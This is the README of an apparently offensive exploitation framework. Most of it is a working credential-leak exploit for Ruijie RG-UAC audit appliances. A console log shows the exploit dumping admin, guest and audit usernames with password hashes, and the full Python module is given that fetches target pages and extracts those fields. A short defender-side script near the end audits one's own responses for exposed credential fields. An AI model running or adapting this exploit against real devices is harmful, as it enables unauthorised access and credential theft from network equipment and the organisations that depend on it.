Exploitation framework
Required modules:
- aiohttp
- prettytable
- urllib3
```bash
python3.10 -m pip install -r requirements.txt
git clone https://github.com/Amzza0x00/Zerooo-Exploitation-Framework.git
cd Zerooo-Exploitation-Framework
python3 console.py
```

```
_ _ _ 1.0.0#dev
_______ _ __ ___ ___ ___ ___ _ __ | | ___ (_) |_
|_ / _ \ r'__/ _ \ / _ \ / _ \/ __| '_ \| |/ _ \| | __|
/ / __/ | | (_) | (_) | (_) \__ \ |_) | | (_) | | |_
/___\___|_| \___/ \___/ \___/|___/ .__/|_|\___/|_|\__|
|_|
Zerooo Exploitation Framework
+ -- --=[ 5 exploits - 4 auxiliary ]
zsf > setg proxy http://127.0.0.1:7890
2021/06/15 16:14:34 [*] proxy => http://127.0.0.1:7890
zsf > use exploit/ruijie/rg-uac-passleak
zsf (rg-uac-passleak) > show options
Module options (exploit/ruijie/rg-uac-passleak):
   Name     Current Setting           Required  Description
   ----     ---------------           --------  -----------
   targets  https://192.168.1.2:3001  yes       目标url,多个目标请用,分开
zsf (rg-uac-passleak) > run
2021/06/12 16:14:49 [*] Running module exploit/ruijie/rg-uac-passleak...
2021/06/12 16:14:49 [*] Current task 1
2021/06/12 16:15:12 [+] name:admin,password:8b6ebdca5ad9f22c64a831f9ab262159
2021/06/12 16:15:12 [+] name:guest,password:fcf41657f02f88137a1bcf068a32c0a3
2021/06/12 16:15:12 [+] name:audit,password:d33542b8458db8cabd9843fe7c1e8784
2021/06/12 16:15:12 [*] exploit complete
zsf (rg-uac-passleak) >
```
```python
import re

from zerooo.core.asyncpool import async_run  # runs the coroutines
from zerooo.core.log import LOGGER  # coloured output
from zerooo.core.options import Option  # sets and reads the exp's attributes
from zerooo.request.httpclient import HttpClient  # asynchronous HTTP requests
from zerooo.utils.util import get_target  # splits multiple targets

# NOTE: OptArgset (the global options) is referenced below; its import is not shown on this page.


# Define the Zerooosploit class, inheriting from Option
class Zerooosploit(Option):
    def __init__(self):
        super().__init__()
        self.info = {
            'Name': '锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露',  # exp name
            'Module': 'exploit/ruijie/rg-uac-passleak',  # exp path
            'Product': '锐捷RG-UAC统一上网行为管理审计系统',  # product
            'Cve': '',  # CVE number
            'Create_date': '20210411',  # creation date
            'Description': '锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台',  # description
            'Authors': '',  # authors
            'References': ''  # reference links
        }
        # Register the parameters the exp needs.
        # Current Setting: default value; Required: optional/mandatory; Description: parameter description.
        # OptArgset.urls uses the global parameter.
        self.option = {
            'urls': {'Current Setting': OptArgset.urls, 'Required': 'yes', 'Description': '目标url,多个目标请用,分开'},
            'limit': {'Current Setting': None, 'Required': 'no', 'Description': '并发限制(默认根据当前系统自动调整)'}
        }

    # "async def" defines an asynchronous function
    async def rg_uac_passleak(self, target):
        # Request method, path, etc.
        resp = await HttpClient().send_request_cgi('GET', url=target)
        return resp

    # Asynchronous callback that processes the result
    def rg_uac_passleak_callback(self, future):
        resp = future.result()
        if resp:
            if resp['code'] == 200:
                result = resp['text']
                user = re.findall('"name":"(.*?)"', result)
                password = re.findall('"password":"(.*?)"', result)
                if user:
                    LOGGER.success(f'存在漏洞 (Find vuln) : {resp["url"]}')
                    # zip() stops at the shorter list, so a missing password cannot raise IndexError
                    for name, pwd in zip(user, password):
                        msg = f'name:{name},password:{pwd}'
                        LOGGER.success(msg)
                else:
                    msg = f'目标不存在漏洞 (The target not find vuln): {resp["url"]}'
                    LOGGER.info(msg)
            else:
                msg = f'目标不存在漏洞 (The target not find vuln): {resp["url"]}'
                LOGGER.info(msg)

    # Entry point
    def exploit(self):
        # Call get_options to read the parameters
        urls = self.get_options('urls')
        limit = self.get_options('limit')
        # async_run arguments: arg1 the async callable, arg2 its argument (a single list only),
        # arg3 the async callback, arg4 the concurrency limit
        async_run(self.rg_uac_passleak, urls, self.rg_uac_passleak_callback, limit)
        LOGGER.info('运行完成 (exploit complete)')
```
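A defender-side counterpart to the callback above, as an added example that is not part of the Zerooo project: it audits HTTP response bodies collected from your own management interfaces for `name`/`password` pairs exposed in the page, pairing fields per object and reporting only the shape of each value. The function names and sample bodies are constructed for illustration; only the two field names come from the module's regexes.

```python
import re

# Constructed sample bodies (not taken from any real device).
LEAKY_BODY = ('<script>var users=[{"name":"admin","password":'
              '"0123456789abcdef0123456789abcdef"},{"name":"guest","password":""}];</script>')
CLEAN_BODY = '<form><input name="name"><input type="password" name="password"></form>'

# Match one flat {...} object at a time so that a name is only ever paired
# with the password found in the same object.
OBJECT_RE = re.compile(r'\{[^{}]*\}')
FIELD_RE = re.compile(r'"(name|password)"\s*:\s*"([^"]*)"')
# Hex digests of 32, 40 or 64 characters (the lengths of MD5, SHA-1, SHA-256).
HASH_RE = re.compile(r'(?:[0-9a-fA-F]{32}|[0-9a-fA-F]{40}|[0-9a-fA-F]{64})')


def find_credential_leaks(body):
    """Return one finding per object exposing a non-empty password value.

    The value itself is never returned, only its shape and length, so the
    report is safe to store in logs or tickets.
    """
    findings = []
    for obj in OBJECT_RE.findall(body):
        fields = dict(FIELD_RE.findall(obj))
        password = fields.get('password')
        if 'name' not in fields or not password:
            continue
        kind = 'hash-shaped' if HASH_RE.fullmatch(password) else 'plaintext-or-other'
        findings.append({'name': fields['name'], 'kind': kind, 'length': len(password)})
    return findings


def audit_responses(responses):
    """responses: iterable of (url, status, body). Return {url: findings} for leaking pages."""
    report = {}
    for url, status, body in responses:
        if status == 200:
            hits = find_credential_leaks(body)
            if hits:
                report[url] = hits
    return report


if __name__ == '__main__':
    print(audit_responses([('https://192.0.2.10/', 200, LEAKY_BODY),
                           ('https://192.0.2.11/', 200, CLEAN_BODY)]))
```

Any finding means the page hands credential material to whoever can fetch it; the fix belongs on the server side, by removing the values from the response.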
Issues are welcome (please include the log files from the logs directory).